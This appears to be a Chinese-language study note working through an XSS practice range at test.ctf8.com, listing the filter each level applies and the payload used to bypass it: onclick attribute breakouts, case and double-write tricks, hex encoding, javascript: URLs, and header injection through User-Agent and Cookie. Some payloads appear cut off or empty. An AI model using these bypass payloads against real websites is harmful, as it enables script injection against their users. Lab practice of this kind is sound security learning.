Web安全测试学习笔记 - XSS靶场 - test.ctf8.com
1.
2.显示文字区域过滤了<>,但是input没有过滤,payload:">
3.显示文字区域和input都过滤了<>,payload:'onclick='javascript:alert(1)'
4. payload:" onclick='javascript:alert(1)'
6.href,src,data这些关键字都加下划线了,payload:" Onclick='javascript:alert(1)'
7.双写绕过,payload:">
8.16进制编码,payload: javascript:alert(1);
9.必须要有http://,利用js的注释符,payload:javascript:alert(1) // http://
10.有个隐藏控件,但是过滤了<>,payload:&t_sort=" type="text" onclick="alert(1)
11.跪了,网上找的答案:
12. 和上一题一样,改User Agent
13.同上,用Cookie
14、15貌似都有问题,跳过
16. script和空格没法用,payload:keyword=,或者:
17-20. flash会被禁止,无法弹框